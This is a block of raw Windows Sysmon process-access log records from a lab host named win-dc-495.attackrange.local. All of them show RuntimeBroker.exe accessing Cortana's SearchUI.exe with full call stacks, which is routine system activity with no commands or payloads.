13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+18280|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.586{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.586{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.586{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.586{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
